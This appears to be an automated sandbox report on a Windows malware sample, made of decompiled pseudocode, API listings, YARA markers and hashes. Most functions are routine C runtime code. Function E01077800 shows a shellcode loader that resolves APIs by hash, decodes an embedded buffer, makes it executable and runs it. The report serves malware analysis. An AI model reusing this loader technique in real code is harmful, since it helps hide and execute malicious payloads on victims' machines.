                                        				_t31 =  *((intOrPtr*)(_t32 + 8));
                                        				if(_t31 != 0) {
                                        					_t12 = E01063117(0xd);
                                        					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
                                        					if( *((intOrPtr*)(_t31 + 4)) != 0) {
                                        						asm("lock xadd [ecx], eax");
                                        						if((_t12 | 0xffffffff) == 0 &&  *((intOrPtr*)(_t31 + 4)) != 0x107e5b0) {
                                        							E010632B6( *((intOrPtr*)(_t31 + 4)));
                                        						}
                                        					}
                                        					 *(_t32 - 4) = 0xfffffffe;
                                        					E01068DC1();
                                        					if( *_t31 != 0) {
                                        						E01063117(0xc);
                                        						 *(_t32 - 4) = 1;
                                        						E0106363B( *_t31);
                                        						_t16 =  *_t31;
                                        						if(_t16 != 0 &&  *_t16 == 0 && _t16 != 0x107e2e8) {
                                        							E010634E1(_t16);
                                        						}
                                        						 *(_t32 - 4) = 0xfffffffe;
                                        						E01068DCD();
                                        					}
                                        					_t10 = E010632B6(_t31);
                                        				}
                                        				return E01062835(_t10);
                                        			}

                                        APIs
                                        • __lock.LIBCMT ref: 01068D38
                                          • Part of subcall function 01063117: __mtinitlocknum.LIBCMT ref: 01063129
                                          • Part of subcall function 01063117: __amsg_exit.LIBCMT ref: 01063135
                                          • Part of subcall function 01063117: EnterCriticalSection.KERNEL32(00000000,?,010616CE,0000000D), ref: 01063142
                                        • _free.LIBCMT ref: 01068D5E
                                          • Part of subcall function 010632B6: HeapFree.KERNEL32(00000000,00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632CA
                                          • Part of subcall function 010632B6: GetLastError.KERNEL32(00000000,?,01061676,00000000,0106419B,010758A9,00000000,?,01073A68,00000000,00010000,00030000,?,01070BB7), ref: 010632DC
                                        • __lock.LIBCMT ref: 01068D77
                                        • ___removelocaleref.LIBCMT ref: 01068D86
                                        • ___freetlocinfo.LIBCMT ref: 01068D9F
                                        • _free.LIBCMT ref: 01068DB2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: __lock_free$CriticalEnterErrorFreeHeapLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                                        • String ID:
                                        • API String ID: 626533743-0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        Similarity
                                        • API ID: __freea$__alloca_probe_16
                                        • String ID:
                                        • API String ID: 3509577899-0
                                        • Opcode ID: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
                                        • Instruction ID: ba12d05f766bd89723834d416a93fcf7bd807e6db9d38219fbf719da127f4fb7
                                        • Opcode Fuzzy Hash: 6323cb0b7d2df73dac5208e1b50e0fd54892c29b0e50e7b46a165c1f56bcb0f0
                                        • Instruction Fuzzy Hash: 3D51B173618216ABEB25BF68CC80EBF7BF9EB54650F2546A8EEC4D6144EB34DC40C650
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 96%
                                        			E010659FE(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                        				void* _t7;
                                        				long _t8;
                                        				intOrPtr* _t9;
                                        				intOrPtr* _t12;
                                        				long _t20;
                                        				long _t31;
                                        
                                        				if(_a4 != 0) {
                                        					_t31 = _a8;
                                        					__eflags = _t31;
                                        					if(_t31 != 0) {
                                        						_push(__ebx);
                                        						while(1) {
                                        							__eflags = _t31 - 0xffffffe0;
                                        							if(_t31 > 0xffffffe0) {
                                        								break;
                                        							}
                                        							__eflags = _t31;
                                        							if(_t31 == 0) {
                                        								_t31 = _t31 + 1;
                                        								__eflags = _t31;
                                        							}
                                        							_t7 = HeapReAlloc( *0x10bfd1c, 0, _a4, _t31);
                                        							_t20 = _t7;
                                        							__eflags = _t20;
                                        							if(_t20 != 0) {
                                        								L17:
                                        								_t8 = _t20;
                                        							} else {
                                        								__eflags =  *0x10c0a40 - _t7;
                                        								if(__eflags == 0) {
                                        									_t9 = E01064196(__eflags);
                                        									 *_t9 = E010641EF(GetLastError());
                                        									goto L17;
                                        								} else {
                                        									__eflags = E0106455B(_t7, _t31);
                                        									if(__eflags == 0) {
                                        										_t12 = E01064196(__eflags);
                                        										 *_t12 = E010641EF(GetLastError());
                                        										L12:
                                        										_t8 = 0;
                                        										__eflags = 0;
                                        									} else {
                                        										continue;
                                        									}
                                        								}
                                        							}
                                        							goto L14;
                                        						}
                                        						E0106455B(_t6, _t31);
                                        						 *((intOrPtr*)(E01064196(__eflags))) = 0xc;
                                        						goto L12;
                                        					} else {
                                        						E010632B6(_a4);
                                        						_t8 = 0;
                                        					}
                                        					L14:
                                        					return _t8;
                                        				} else {
                                        					return E0106596C(__ebx, __edx, __edi, _a8);
                                        				}
                                        			}










                                        APIs
                                        • _malloc.LIBCMT ref: 01065A0A
                                          • Part of subcall function 0106596C: __FF_MSGBANNER.LIBCMT ref: 01065983
                                          • Part of subcall function 0106596C: __NMSG_WRITE.LIBCMT ref: 0106598A
                                          • Part of subcall function 0106596C: HeapAlloc.KERNEL32(012C0000,00000000,00000001,00000000,00000000,00000000,?,0106334C,00000000,00000000,00000000,00000000,?,01063201,00000018,0107CDB0), ref: 010659AF
                                        • _free.LIBCMT ref: 01065A1D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        Similarity
                                        • API ID: AllocHeap_free_malloc
                                        • String ID:
                                        • API String ID: 2734353464-0
                                        • Opcode ID: 937b9056f5003ecd589a27dc14c3b5f26625d5ab01c08e165f1c54e5a247252d
                                        • Instruction ID: f78d5f34113f0e61f70c23818527253ab988fdacd78ea6edbdeb71e0048968f4
                                        • Opcode Fuzzy Hash: 937b9056f5003ecd589a27dc14c3b5f26625d5ab01c08e165f1c54e5a247252d
                                        • Instruction Fuzzy Hash: BE118636504716EFDB717F78AC846AD3BDC9F242A0F104566F9D9DA141EB3589408790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0106F3F6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                        				char _v8;
                                        				intOrPtr _v12;
                                        				int _v20;
                                        				int _t35;
                                        				int _t38;
                                        				intOrPtr* _t44;
                                        				int _t47;
                                        				short* _t49;
                                        				intOrPtr _t50;
                                        				intOrPtr _t54;
                                        				int _t55;
                                        				int _t59;
                                        				char* _t62;
                                        
                                        				_t62 = _a8;
                                        				if(_t62 == 0) {
                                        					L5:
                                        					return 0;
                                        				}
                                        				_t50 = _a12;
                                        				if(_t50 == 0) {
                                        					goto L5;
                                        				}
                                        				if( *_t62 != 0) {
                                        					E010637C4( &_v20, _a16);
                                        					_t35 = _v20;
                                        					__eflags =  *(_t35 + 0xa8);
                                        					if( *(_t35 + 0xa8) != 0) {
                                        						_t38 = E0106F121( *_t62 & 0x000000ff,  &_v20);
                                        						__eflags = _t38;
                                        						if(_t38 == 0) {
                                        							__eflags = _a4;
                                        							_t59 = 1;
                                        							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                        							if(__eflags != 0) {
                                        								L21:
                                        								__eflags = _v8;
                                        								if(_v8 != 0) {
                                        									_t54 = _v12;
                                        									_t31 = _t54 + 0x70;
                                        									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                        									__eflags =  *_t31;
                                        								}
                                        								return _t59;
                                        							}
                                        							L20:
                                        							_t44 = E01064196(__eflags);
                                        							_t59 = _t59 | 0xffffffff;
                                        							__eflags = _t59;
                                        							 *_t44 = 0x2a;
                                        							goto L21;
                                        						}
                                        						_t59 = _v20;
                                        						__eflags =  *(_t59 + 0x74) - 1;
                                        						if( *(_t59 + 0x74) <= 1) {
                                        							L15:
                                        							__eflags = _t50 -  *(_t59 + 0x74);
                                        							L16:
                                        							if(__eflags < 0) {
                                        								goto L20;
                                        							}
                                        							__eflags = _t62[1];
                                        							if(__eflags == 0) {
                                        								goto L20;
                                        							}
                                        							L18:
                                        							_t59 =  *(_t59 + 0x74);
                                        							goto L21;
                                        						}
                                        						__eflags = _t50 -  *(_t59 + 0x74);
                                        						if(__eflags < 0) {
                                        							goto L16;
                                        						}
                                        						__eflags = _a4;
                                        						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                        						_t59 = _v20;
                                        						__eflags = _t47;
                                        						if(_t47 != 0) {
                                        							goto L18;
                                        						}
                                        						goto L15;
                                        					}
                                        					_t55 = _a4;
                                        					__eflags = _t55;
                                        					if(_t55 != 0) {
                                        						 *_t55 =  *_t62 & 0x000000ff;
                                        					}
                                        					_t59 = 1;
                                        					goto L21;
                                        				}
                                        				_t49 = _a4;
                                        				if(_t49 != 0) {
                                        					 *_t49 = 0;
                                        				}
                                        				goto L5;
                                        			}

















                                        APIs
                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0106F42C
                                        • __isleadbyte_l.LIBCMT ref: 0106F45A
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0106F488
                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 0106F4BE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        Similarity
                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                        • String ID:
                                        • API String ID: 3058430110-0
                                        • Opcode ID: 44aa95a71bb5189d2112e843e98540059e092f8e3d025ca04baef6c784de186d
                                        • Instruction ID: 9cae400fde65ca157654dee80779df27549578146d198d94eca8352c2391c763
                                        • Opcode Fuzzy Hash: 44aa95a71bb5189d2112e843e98540059e092f8e3d025ca04baef6c784de186d
                                        • Instruction Fuzzy Hash: 3531C330600247AFDB22CE28E854BBA7FF9FF41220F154169E8A497590DB30D850CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E010687A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                        				intOrPtr* _t24;
                                        				void* _t28;
                                        				intOrPtr* _t40;
                                        				void* _t41;
                                        
                                        				_push(0xc);
                                        				_push(0x107cf38);
                                        				E010627F0(__ebx, __edi, __esi);
                                        				_t28 = E010615FE();
                                        				_t40 = E010632EE(8, 1);
                                        				 *((intOrPtr*)(_t41 - 0x1c)) = _t40;
                                        				_t43 = _t40;
                                        				if(_t40 != 0) {
                                        					E010636DB(_t28, __edx, 1, _t40, __eflags);
                                        					E01063AF6(_t28, __edx, 1, _t40, __eflags);
                                        					 *_t40 =  *((intOrPtr*)(_t28 + 0x6c));
                                        					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t28 + 0x68));
                                        					E01063117(0xc);
                                        					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                        					E0106344C( *_t40);
                                        					 *(_t41 - 4) = 0xfffffffe;
                                        					E01068E70();
                                        					E01063117(0xd);
                                        					 *(_t41 - 4) = 1;
                                        					asm("lock xadd [eax], edi");
                                        					__eflags = 2;
                                        					 *(_t41 - 4) = 0xfffffffe;
                                        					E01068E7C();
                                        					_t24 = _t40;
                                        				} else {
                                        					 *((intOrPtr*)(E01064196(_t43))) = 0xc;
                                        					_t24 = 0;
                                        				}
                                        				return E01062835(_t24);
                                        			}








                                        APIs
                                          • Part of subcall function 010615FE: __getptd_noexit.LIBCMT ref: 010615FF
                                          • Part of subcall function 010615FE: __amsg_exit.LIBCMT ref: 0106160C
                                        • __calloc_crt.LIBCMT ref: 01068DEF
                                          • Part of subcall function 010632EE: __calloc_impl.LIBCMT ref: 010632FD
                                        • __lock.LIBCMT ref: 01068E25
                                        • ___addlocaleref.LIBCMT ref: 01068E31
                                        • __lock.LIBCMT ref: 01068E45
                                          • Part of subcall function 01064196: __getptd_noexit.LIBCMT ref: 01064196
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        Similarity
                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                        • String ID:
                                        • API String ID: 2580527540-0
                                        • Opcode ID: ba12ebdd6533bb649224a90c404662ddada4d4d54380fc9c01be9333a190581c
                                        • Instruction ID: ed79b797b199567b6beb09da8a3a6740a72e3d513c320f02d58842ccb50fc915
                                        • Opcode Fuzzy Hash: ba12ebdd6533bb649224a90c404662ddada4d4d54380fc9c01be9333a190581c
                                        • Instruction Fuzzy Hash: 32015231A05302EFD720BFB98901B9DB7E8AF65720F10814AE4D99F2D0DB745D41CAA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E01072F81(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                        				intOrPtr _t25;
                                        				void* _t26;
                                        
                                        				_t25 = _a16;
                                        				if(_t25 == 0x65 || _t25 == 0x45) {
                                        					_t26 = E010734F0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                        					goto L9;
                                        				} else {
                                        					_t35 = _t25 - 0x66;
                                        					if(_t25 != 0x66) {
                                        						__eflags = _t25 - 0x61;
                                        						if(_t25 == 0x61) {
                                        							L7:
                                        							_t26 = E01073025(_a4, _a8, _a12, _a20, _a24, _a28);
                                        						} else {
                                        							__eflags = _t25 - 0x41;
                                        							if(__eflags == 0) {
                                        								goto L7;
                                        							} else {
                                        								_t26 = E010737A4(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                        							}
                                        						}
                                        						L9:
                                        						return _t26;
                                        					} else {
                                        						return E010736C5(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
                                        					}
                                        				}
                                        			}






                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                        • String ID:
                                        • API String ID: 3016257755-0
                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction ID: a8f7806c986f01df1c3fc52e3d4c6ab4070d4a5267a5bcfa79cf02249f7dcfa9
                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                        • Instruction Fuzzy Hash: 9E01497280014EBBDF275E88CC15CEE3F66BF18354B498565FE9858131D237CAB1AB89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 01082892
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 01082897
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 0108289C
                                          • Part of subcall function 01082AB1: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 01082AC2
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 010828B1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction ID: b1c52812ca530411cef9d31a1f07505b78d713714c0642a0fdd6fa815063bdab
                                        • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                                        • Instruction Fuzzy Hash: F3C04C3842D223D22C713E7422101ED77404CB269878620C29CC2175038E05410BD433
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp
                                        Yara matches
                                        Similarity
                                        • API ID: ___free_lconv_mon
                                        • String ID: X&A$h&A
                                        • API String ID: 3903695350-2460073903
                                        • Opcode ID: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                                        • Instruction ID: c89599ffa752a7419cc6ed1d924e3923b80d600b097e28779840c888ba2b925a
                                        • Opcode Fuzzy Hash: dba504eb91724cc7cfc389edac21456d4d1c599f40ca9baf248d7b7104a13552
                                        • Instruction Fuzzy Hash: EB319E71A08602DFEB71BA78D844B9BB7F8BF10310F114A69E4D9D7190EF32E8958B50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Executed Functions

                                        Non-executed Functions

                                        C-Code - Quality: 100%
                                        			E0106E84E(short _a4, intOrPtr _a8) {
                                        				short _t13;
                                        				short _t28;
                                        
                                        				_t28 = _a4;
                                        				if(_t28 != 0 &&  *_t28 != 0 && E0106DB06(_t28, ?str?) != 0) {
                                        					if(E0106DB06(_t28, ?str?) != 0) {
                                        						return E0106FA26(_t28);
                                        					}
                                        					if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_a4, 2) == 0) {
                                        						L9:
                                        						return 0;
                                        					}
                                        					return _a4;
                                        				}
                                        				if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_a4, 2) == 0) {
                                        					goto L9;
                                        				}
                                        				_t13 = _a4;
                                        				if(_t13 == 0) {
                                        					return GetACP();
                                        				}
                                        				return _t13;
                                        			}






                                        APIs
                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0106EB14,?,00000000), ref: 0106E892
                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0106EB14,?,00000000), ref: 0106E8BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: InfoLocale
                                        • String ID: ACP$OCP
                                        • API String ID: 2299586839-711371036
                                        • Opcode ID: 8cc306d0d13236e9d297cf3fd0c8d0b4c6256e7ea92488f03906373ad26e1c2f
                                        • Instruction ID: 12fd7acf0873c07d9608c5397906c1e96789aa8252d905b93fad9b2eabc73800
                                        • Opcode Fuzzy Hash: 8cc306d0d13236e9d297cf3fd0c8d0b4c6256e7ea92488f03906373ad26e1c2f
                                        • Instruction Fuzzy Hash: 83018035601306AEEB61DA5DD844EEA3BDC9F05660B148466FA8CEA155E730D5808790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 29%
                                        			E01077800(void* __ebx, void* __esi, void* __eflags) {
                                        				intOrPtr _v8;
                                        				char _v12;
                                        				long _v16;
                                        				char _v18;
                                        				short _v20;
                                        				intOrPtr _v24;
                                        				char _v28;
                                        				char _v30;
                                        				short _v32;
                                        				intOrPtr _v36;
                                        				char _v40;
                                        				void* __edi;
                                        				intOrPtr* _t40;
                                        				intOrPtr* _t43;
                                        				intOrPtr* _t48;
                                        				void* _t49;
                                        				signed char _t50;
                                        				intOrPtr* _t56;
                                        				void* _t85;
                                        				void* _t87;
                                        
                                        				_v28 = 0x72657355;
                                        				_v24 = 0x642e3233;
                                        				_v20 = 0x6c6c;
                                        				_v18 = 0;
                                        				_v40 = 0x72637052;
                                        				_v36 = 0x642e3474;
                                        				_v32 = 0x6c6c;
                                        				_v30 = 0;
                                        				_t56 = E01077950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x8ca9ef6c);
                                        				_t12 =  &_v28; // 0x72657355
                                        				_v8 = E01077950( *_t56(_t12, _t85, __esi, __ebx), 0xb4c47f55);
                                        				_t40 = E01077950( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x5790f301);
                                        				_t17 =  &_v28; // 0x72657355
                                        				_t43 = E01077950( *_t56(_t17), 0xc7e6f44f);
                                        				 *_t43( *_t40(0));
                                        				_t18 =  &_v40; // 0x72637052
                                        				_t48 = E01077950( *_t56(_t18), 0x958d1c17);
                                        				_t49 =  *_t48(2, 0, 1, 0,  &_v12);
                                        				_t87 = 0;
                                        				if(_t49 != 0 && _t49 == 0x57) {
                                        					_t50 = 0;
                                        					do {
                                        						_t20 = 0x107f0d0 + _t50; // 0xcbf195bd
                                        						asm("rol dl, 0x2");
                                        						asm("ror dl, 0x3");
                                        						 *(0x107f0d0 + _t50) = (_t50 + _t50 - ((( ~( !( *_t20) ^ 0x00000097) - 0x00000027 ^ _t50) - _t50 ^ _t50) - 0x00000060 ^ _t50) ^ _t50) - 0x00000052 ^ _t50;
                                        						_t50 = _t50 + 1;
                                        					} while (_t50 < 0x1e05);
                                        					VirtualProtect(0x107f0d0, 0x1e05, 0x40,  &_v16);
                                        					_v8(0x107f0d0, 0x1080ed8, 0, 0, 0);
                                        					return E01077D10(_t87);
                                        				}
                                        				return _t49;
                                        			}
























                                        APIs
                                        • VirtualProtect.KERNEL32(0107F0D0,00001E05,00000040,?), ref: 0107792C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID: Rpcrt4.dllUser32.dll$User32.dll
                                        • API String ID: 544645111-2494872352
                                        • Opcode ID: 438720ef081869dd006ec030dc15019bc7c79eded65c5e3209b18a18c5344be2
                                        • Instruction ID: 154657245df555d4070759374ac87797fa3ff0e4785defbcb9ca7b1ac9af44e5
                                        • Opcode Fuzzy Hash: 438720ef081869dd006ec030dc15019bc7c79eded65c5e3209b18a18c5344be2
                                        • Instruction Fuzzy Hash: DF31FF71B402099FDB01DBB9C88ABDFB7E5EF49710F100094E644EB3A2DA75D9048798
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E01068E85(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr _t12;
                                        				intOrPtr _t13;
                                        				intOrPtr _t15;
                                        				intOrPtr _t22;
                                        				intOrPtr* _t42;
                                        
                                        				if(_a4 > 5 || _a8 == 0) {
                                        					L4:
                                        					return 0;
                                        				} else {
                                        					_t42 = E010632EE(8, 1);
                                        					_t48 = _t42;
                                        					if(_t42 != 0) {
                                        						_t12 = E010632EE(0xb8, 1);
                                        						 *_t42 = _t12;
                                        						__eflags = _t12;
                                        						if(_t12 != 0) {
                                        							_t13 = E010632EE(0x220, 1);
                                        							 *((intOrPtr*)(_t42 + 4)) = _t13;
                                        							__eflags = _t13;
                                        							if(_t13 != 0) {
                                        								E0106899A( *_t42, 0x107e2e8);
                                        								_t15 = E01069285(__ebx, __edx, 1, _t42,  *_t42, _a4, _a8);
                                        								_push( *((intOrPtr*)(_t42 + 4)));
                                        								__eflags = _t15;
                                        								if(__eflags == 0) {
                                        									L14:
                                        									E010632B6();
                                        									E0106363B( *_t42);
                                        									E010634E1( *_t42);
                                        									E010632B6(_t42);
                                        									_t42 = 0;
                                        									L16:
                                        									return _t42;
                                        								}
                                        								_push( *((intOrPtr*)( *_t42 + 4)));
                                        								_t22 = E01063D75(__edx, 1, __eflags);
                                        								__eflags = _t22;
                                        								if(_t22 == 0) {
                                        									 *((intOrPtr*)( *((intOrPtr*)(_t42 + 4)))) = 1;
                                        									goto L16;
                                        								}
                                        								_push( *((intOrPtr*)(_t42 + 4)));
                                        								goto L14;
                                        							}
                                        							E010632B6( *_t42);
                                        							E010632B6(_t42);
                                        							L8:
                                        							goto L3;
                                        						}
                                        						E010632B6(_t42);
                                        						goto L8;
                                        					}
                                        					L3:
                                        					 *((intOrPtr*)(E01064196(_t48))) = 0xc;
                                        					goto L4;
                                        				}
                                        			}












                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.647807937.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000002.00000002.647801650.0000000001060000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647822987.0000000001078000.00000002.00020000.sdmp
                                        • Associated: 00000002.00000002.647830038.000000000107E000.00000008.00020000.sdmp
                                        • Associated: 00000002.00000002.647861751.00000000010C2000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                        • String ID:
                                        • API String ID: 1503006713-0
                                        • Opcode ID: afe31fc9fb2fb7e3dea506f41fced573b38c4d488e3e387b5d46c45d178fac5f
                                        • Instruction ID: afbdd92a562c442b85e8f65c81aa0ca17e4ce2b9ec2fcc4ccf0fcc0ae5777c7f
                                        • Opcode Fuzzy Hash: afe31fc9fb2fb7e3dea506f41fced573b38c4d488e3e387b5d46c45d178fac5f
                                        • Instruction Fuzzy Hash: 8F21A135508713EAEB327F69DC01A8BBBEDEF61754B10846AE9CD99160EE328400C695
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 74%
                                        			E0106197C(void* __eax, void* __ebx) {
                                        				intOrPtr _t5;
                                        				intOrPtr _t8;
                                        				void* _t9;
                                        				void* _t14;
                                        				void* _t24;
                                        				intOrPtr* _t25;
                                        				signed int _t26;
                                        				signed int _t27;
                                        
                                        				_t14 = __ebx;
                                        				__imp__DecodePointer( *0x10c1b34);
                                        				_t25 =  *0x10bfcfc; // 0x0
                                        				_t24 = __eax;
                                        				if(_t25 != 0) {
                                        					while( *_t25 != 0) {
                                        						E010632B6( *_t25);
                                        						_t25 = _t25 + 4;
                                        						if(_t25 != 0) {
                                        							continue;
                                        						}
                                        						break;
                                        					}
                                        					_t25 =  *0x10bfcfc; // 0x0
                                        				}
                                        				_push(_t14);
                                        				E010632B6(_t25);
                                        				_t26 =  *0x10bfcf8; // 0x0
                                        				 *0x10bfcfc = 0;
                                        				if(_t26 != 0) {
                                        					while( *_t26 != 0) {
                                        						E010632B6( *_t26);
                                        						_t26 = _t26 + 4;
                                        						if(_t26 != 0) {
                                        							continue;
                                        						}
                                        						break;
                                        					}
                                        					_t26 =  *0x10bfcf8; // 0x0
                                        				}
                                        				E010632B6(_t26);
                                        				 *0x10bfcf8 = 0;
                                        				E010632B6( *0x10bfcf4);
